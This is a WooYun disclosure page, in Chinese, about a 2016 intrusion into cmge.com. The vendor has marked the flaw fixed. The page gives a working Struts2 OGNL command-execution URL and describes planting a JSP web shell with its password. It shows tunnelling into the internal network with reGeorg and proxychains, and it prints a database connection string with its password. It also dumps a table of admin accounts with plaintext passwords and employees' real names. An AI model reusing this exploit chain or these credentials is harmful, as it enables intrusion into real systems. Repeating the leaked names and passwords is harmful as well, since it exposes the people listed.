当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166727

漏洞标题:中国手游某站远程命令执行getshell已内网

相关厂商:cmge.com

漏洞作者: hecate

提交时间:2016-01-02 02:12

修复时间:2016-01-06 10:52

公开时间:2016-01-06 10:52

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

厂商打算送我礼物,礼尚往来,新年我就再送个洞给你们吧

详细说明:

Struts2远程命令执行

http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29


111.png


上传一句话 http://oss.cmge.com/config.jsp

Image 1.png


ifconfig
em1 Link encap:Ethernet HWaddr F8:BC:12:4A:AB:0C
inet addr:123.59.73.98 Bcast:123.59.73.111 Mask:255.255.255.240
inet6 addr: fe80::fabc:12ff:fe4a:ab0c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:234690100 errors:0 dropped:0 overruns:0 frame:0
TX packets:191975833 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:111717497757 (104.0 GiB) TX bytes:55754980927 (51.9 GiB)
Interrupt:35
em2 Link encap:Ethernet HWaddr F8:BC:12:4A:AB:0D
inet addr:10.200.130.7 Bcast:10.200.130.255 Mask:255.255.255.0
inet6 addr: fe80::fabc:12ff:fe4a:ab0d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:228082396 errors:0 dropped:0 overruns:0 frame:0
TX packets:328168633 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:102848879805 (95.7 GiB) TX bytes:173878904275 (161.9 GiB)
Interrupt:38
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:69850555 errors:0 dropped:0 overruns:0 frame:0
TX packets:69850555 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:104502101713 (97.3 GiB) TX bytes:104502101713 (97.3 GiB)


查看数据库配置文件

#database.jdbc.url=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.shaolin=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.daota=jdbc:mysql://10.200.130.8:3306/goanaysis_daota?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.xingzhan=jdbc:mysql://10.200.130.8:3306/goanaysis_xzhan?useUnicode=true&characterEncoding=UTF-8
database.user=lhm_rw
database.pwd=w&*&PO96>dLD38L)_(HK1P4^LHM^%a


这密码牛逼
站库分离,上传tunnel.jsp, reGeorg+proxychains代理进入内网,内网存活主机太少,看来被隔离了
直接连接数据库吧

$ python reGeorgSocksProxy.py -p 9527 -u http://oss.cmge.com/tunnel.jsp
$ proxychains mysql -h 10.200.130.8 -u lhm_rw -p


1.png


mysql> select * from MANAGE_USER;


全是弱口令

+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| id | UserName | Passwd | TrueName | Sex | Org | RoleId | CreateTime | CreatorId | LastUpdateTime | LastUpdateUserId |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| 40 | root | abc321 | 超级管理员 | 1 | 00 | 40 | 2012-12-13 00:00:00 | 0 | 2015-01-14 14:09:28 | 40 |
| 99 | ken | abc321 | 肖健 | 1 | | 75 | 2015-08-28 15:41:56 | 40 | 2015-08-28 15:41:56 | 40 |
| 101 | oscar | abc321 | 陈韬 | 1 | | 75 | 2015-08-30 00:00:00 | 40 | 2015-10-09 16:29:33 | 40 |
| 107 | danny | abc321 | 许光翔 | 1 | | 75 | 2015-08-31 09:41:58 | 40 | 2015-08-31 09:41:58 | 40 |
| 109 | luke | abc321 | 王晓霖 | 1 | | 75 | 2015-08-31 09:42:31 | 40 | 2015-08-31 09:42:31 | 40 |
| 110 | adam | abc123 | 梁红明 | 1 | | 75 | 2015-09-08 09:51:28 | 40 | 2015-09-08 09:51:28 | 40 |
| 111 | thor | abc321 | 才健楠 | 1 | | 76 | 2015-10-09 00:00:00 | 40 | 2015-11-13 14:16:15 | 40 |
| 112 | alan | abc321 | 彭鹏飞 | 1 | | 75 | 2015-10-10 16:47:42 | 40 | 2015-10-10 16:47:42 | 40 |
| 113 | huanghui | abc321 | 黄辉 | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-11-13 14:15:59 | 40 |
| 114 | will | abc321 | will | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-11-13 14:15:50 | 40 |
| 116 | chenfeng | abc321 | 陈峰 | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-10-22 16:46:53 | 40 |
| 117 | zhangsonlin | abc321 | 张松林 | 1 | | 77 | 2015-10-26 18:11:55 | 40 | 2015-10-26 18:11:55 | 40 |
| 118 | liminmin | abc321 | 李敏敏 | 2 | | 76 | 2015-10-27 14:38:09 | 40 | 2015-10-27 14:38:09 | 40 |
| 119 | likeyu | abc123 | 李科宇 | 1 | | 77 | 2015-11-13 15:06:51 | 40 | 2015-11-13 15:06:51 | 40 |
| 120 | zhangxin | abc123 | 张鈊 | 1 | | 77 | 2015-11-13 15:07:33 | 40 | 2015-11-13 15:07:33 | 40 |
| 121 | huwenming | abc123 | 胡文明 | 1 | | 77 | 2015-11-13 15:07:54 | 40 | 2015-11-13 15:07:54 | 40 |
| 122 | chenpeng | abc123 | 陈鹏 | 1 | | 76 | 2015-11-13 00:00:00 | 40 | 2015-12-21 18:08:16 | 40 |
| 123 | fengmingma | abc321 | fengming.ma@cmge.com | 1 | | 76 | 2015-12-23 15:30:35 | 40 | 2015-12-23 15:30:35 | 40 |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+


129_meitu_1.jpg

漏洞证明:

http://oss.cmge.com/config.jsp
密码 wooyun

修复方案:

升级

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-06 10:48

厂商回复:

已经通知开发升级补丁,感谢!

最新状态:

2016-01-06:已修复

2016-01-06:已修复